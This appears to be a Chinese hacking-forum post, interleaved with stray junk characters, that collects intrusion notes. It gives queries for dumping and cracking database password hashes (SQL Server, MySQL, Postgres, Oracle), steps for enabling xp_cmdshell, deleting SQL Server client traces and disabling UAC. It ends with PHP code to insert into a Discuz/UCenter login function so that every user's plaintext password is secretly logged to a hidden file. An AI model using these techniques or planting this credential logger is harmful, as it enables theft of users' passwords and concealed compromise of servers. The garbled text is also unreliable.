. u4 O; w+ ]* h* _" d3 w各种类型数据库抓HASH破解最高权限密码!3 }( F6 `4 S8 s- S: y) i7 I3 B
1.sql server2000+ }0 n1 U; L6 l% P9 N. `- f; e% `7 o
SELECT password from master.dbo.sysxlogins where name='sa'
! i3 G, i( ]8 `: I- V2 S0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
9 O- Q! R% ~. i5 w4 I% }2FD54D6119FFF04129A1D72E7C3194F7284A7F3A% G( S/ ^% \3 @
8 E6 F( m/ `$ D$ L. ~6 D2 {9 e" A/ Y0×0100- constant header; H8 ~/ H% j0 H* y# L( D. ^8 l3 t
34767D5C- salt
* a" ~/ J' }9 x$ g7 `2 i0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash0 [' w- H: o5 D
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash# A3 y/ O8 o5 S* f
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash' d9 ~6 f1 t9 M7 r8 m6 a4 e1 G
SQL server 2005:-
2 T: e5 K2 f3 W; QSELECT password_hash FROM sys.sql_logins where name='sa'
, L% ^$ a7 a3 R7 t$ e0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F `0 [: E6 a4 o
0×0100- constant header* @2 l" {7 F3 k7 K) G. Y S
993BF231-salt; m- o$ x% r8 t1 P
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
) R! Z0 l9 O3 {8 V9 a! A; B \crack case sensitive hash in cain, try brute force and dictionary based attacks.. }3 r0 y" w' m+ _. W, ~
( i: N5 L3 W" Z4 A$ u2 r1 t
update:- following bernardo’s comments:-! ]- R8 E R( |
use function fn_varbintohexstr() to cast password in a hex string.' y$ x9 q: X0 n" c* d, r$ B
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins4 |" D+ |7 N6 g1 g+ Z0 {( S7 c6 V7 E
+ D8 o/ h) C3 g- u0 S+ B6 i) F
MYSQL:-
( w w6 e+ l" e" C
$ }5 c. ?; V5 a. Z! FIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
% F0 y3 D3 D; y: o& _$ p7 y# n$ b& B# R5 O
*mysql < 4.1
9 }* a* d7 R" N/ t
% L( Q1 o4 g0 H8 [- B. Jmysql> SELECT PASSWORD(‘mypass’);
/ h0 B# z$ c4 G+——————–+% W" o! A& {, A2 U. p
| PASSWORD(‘mypass’) |
8 S( r3 T# I z8 b4 \+——————–+
3 B r) e4 s* U/ z| 6f8c114b58f2ce9e |, ] p4 v+ ~4 x4 X, t: J
+——————–+1 ?; d# o: o8 E) {
8 ]1 M1 K* a5 p. i9 g: U
*mysql >=4.1% m6 V. D& B- \' l* K2 q# ?- k
3 M0 S8 h) y! _ u: s& j! Q
mysql> SELECT PASSWORD(‘mypass’);! h, C2 s* L. q$ |% T
+——————————————-+0 c" ^9 @! C# C! g
| PASSWORD(‘mypass’) |1 y6 x, I" ]# h: f. I
+——————————————-+0 Q& P& B5 D6 }( c
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
2 L1 L* G7 N% P2 k& ~+——————————————-+
+ K. V+ z2 W0 Q7 K8 E. `
+ @& ~/ ?% `4 t( U; [Select user, password from mysql.user
& U* G9 ~5 G' B) R& s2 VThe hashes can be cracked in ‘cain and abel’, @% ^0 E% `% d) `' N
8 Z9 d- d5 u% m2 ^/ l7 K( n5 x
Postgres:-
/ t; q* \9 K$ K% p7 kPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)" w2 ~+ k2 R6 W2 I/ {" @1 I
select usename, passwd from pg_shadow;
" L. g! L3 w8 Z/ F9 N8 @5 [usename | passwd/ f- v! |$ T3 ~* Q% K* G
——————+————————————-, c" M2 G$ j8 z9 U& V" @
testuser | md5fabb6d7172aadfda4753bf0507ed4396
, Z- |$ L" C) {0 l3 tuse mdcrack to crack these hashes:-
" e! J7 ~1 s* h$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396- ^: h. e) {" l. j; Z8 G
: p& q U$ p& @2 l1 T
Oracle:-+ c3 H& |6 G& r4 V$ `) F
select name, password, spare4 from sys.user$
9 g6 J* }7 C! H& M" `hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
! g9 f& P5 T6 d+ X2 @( m- n2 }More on Oracle later, i am a bit bored….
& @/ O: V. o* H* H6 \! S6 s
" j2 U" h9 r& J* U1 `2 z4 l, h- F; u; o
在sql server2005/2008中开启xp_cmdshell
- y) L: r; Z" c4 s6 p9 o2 x-- To allow advanced options to be changed.
, W" u5 H/ G4 B" P5 h2 w/ aEXEC sp_configure 'show advanced options', 1$ ]+ e7 D$ x# Q5 G$ W6 L6 a
GO
7 C7 Y& o- y3 c3 t$ q$ |& J8 L-- To update the currently configured value for advanced options.
+ J8 t7 r" ^* hRECONFIGURE
' ~ P" \ V# JGO
6 b7 g- i$ O% M-- To enable the feature.
6 ~! c9 s+ C1 b# z# N+ fEXEC sp_configure 'xp_cmdshell', 1
' d# x- c8 n% ^- j8 RGO8 W6 ~" s/ r" a" n2 h1 n8 F
-- To update the currently configured value for this feature.
0 F& a' u# W! y* @RECONFIGURE9 A, ~4 U; Q$ F- `& v/ i
GO
- c# T: t9 a7 l& k+ `" ^8 h/ RSQL 2008 server日志清除,在清楚前一定要备份。
/ t9 U, h' W+ L3 Q$ v如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:6 Y! n9 x2 O3 z4 M
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin7 f# o: R4 K A
" Q6 f) F( U& k0 O( r* I* b对于SQL Server 2008以前的版本:6 x2 H' A1 L' v; K
SQL Server 2005:
0 Q, |; }6 ?# c" l. ]$ ? X' H, [1 D删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat) ]/ e2 G' f8 r3 ~" A
SQL Server 2000:8 W H% I/ M9 M! ~
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。( x( t" |, l) Z* e# d; W0 O
1 Q3 T# H3 n( U( ]$ ~$ U+ p: \% x本帖最后由 simeon 于 2013-1-3 09:51 编辑
" @ R4 w) b! ? \% @1 W* V
6 S; J3 D. ^) h0 D, `# h) B! V, b) |8 Z9 P, [
windows 2008 文件权限修改, A- z4 k5 [, o: B8 k5 G. T
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
( p U: ]3 {4 z1 V( |( r2 Z2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
, a3 g- F, |; Y% j' Y一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,7 x1 @$ R* {* U; a' t! R
; y4 g8 {$ L1 J% |' n! `Windows Registry Editor Version 5.00
0 D1 Y* C/ P) H$ {, D* }. d0 A/ V[HKEY_CLASSES_ROOT\*\shell\runas]
" T! C- l9 R, [/ J1 T@="管理员取得所有权"8 P( R+ w( }! l2 r% W Y
"NoWorkingDirectory"=""4 C; j. j9 z$ o/ V! w/ {( O
[HKEY_CLASSES_ROOT\*\shell\runas\command]
# p, S3 J: G5 k! |" Q! B@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( a+ H4 H( U1 m o, D"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
- i' q0 f: f( } ?2 P/ _7 {7 N+ Y* Y[HKEY_CLASSES_ROOT\exefile\shell\runas2]& B3 {! I+ F( j% z
@="管理员取得所有权"
! n3 Y% i) {3 T7 d8 l9 h( M1 O"NoWorkingDirectory"=""3 P Y8 N0 I5 ]8 _8 C3 h+ T( N
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]( t! B5 w* \4 Q5 w. }5 Z# ]3 d* M! ^
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' r1 e, X M: Y7 h+ {7 T5 M& A a9 T"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"1 {" W/ j: X2 p: K8 k
" q S1 A+ F% Q2 b6 w w[HKEY_CLASSES_ROOT\Directory\shell\runas]
* [. J* |+ X# K6 D* ^@="管理员取得所有权"
( |! u; P B# _( i% K# O"NoWorkingDirectory"=""* H% ^! A, N# v5 K( S5 P# D q
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]; C2 c+ ^6 \. Q6 H; e: S
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"5 L3 X) |7 O( Q/ v' j
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"/ |) y+ T# V* c7 {8 L0 V
0 {/ u. ?( G0 N" D+ E6 }" d h9 X
win7右键“管理员取得所有权”.reg导入& A+ y) P5 Q& w5 j
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,% {3 f {7 A- a& g9 C ?- k X1 K
1、C:\Windows这个路径的“notepad.exe”不需要替换9 X6 X5 @4 @, }
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换1 P& S4 x8 t, k& y' ?$ @; \
3、四个“notepad.exe.mui”不要管" H2 W/ V2 l+ Z p! C; \
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和# X/ ^! @/ n' Y& ? k' H3 x" I7 u
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”5 |" U) U# t* d0 r1 X5 @% v- x& \
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
0 }7 y- |8 E& e4 S7 u$ v6 d9 B' A替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
, V9 I, U8 }6 \windows 2008中关闭安全策略: 0 k2 z& J7 T f( S
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
' Q; G" V6 m4 Q2 T, R修改uc_client目录下的client.php 在; R" e, L+ C$ f, ]& R+ j6 n2 V# q
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {! i* c: _# d) I: z3 I+ B" F
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php0 V7 y$ E" ~; U' X. M! j' m- R
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
- L3 e) w# ^& f9 W( X9 h4 Kif(getenv('HTTP_CLIENT_IP')) {
3 u& u2 W5 k" w1 T! \4 _$onlineip = getenv('HTTP_CLIENT_IP');
/ Z% \% g: H; e7 S1 b6 ?. o} elseif(getenv('HTTP_X_FORWARDED_FOR')) {4 \) u" g" @, b/ G" e7 x( k
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
6 ^0 q6 a2 X4 ~$ v} elseif(getenv('REMOTE_ADDR')) {3 }9 N& m# A8 w6 y# P1 T8 O" d! i
$onlineip = getenv('REMOTE_ADDR');6 E+ \8 |& U' k3 Z: W/ w
} else {
, X/ H+ _ v1 L" i! b" W$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
, P2 H) C' L3 w8 r% _, n}5 v% A3 R) g" ?% O0 m
$showtime=date("Y-m-d H:i:s");
- t; {" }& @5 C/ Y6 ]% Y5 `/ ] $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
7 k8 I+ D' r: \0 ?5 q $handle=fopen('./data/cache/csslog.php','a+');
. x& c$ e4 y& n9 x $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对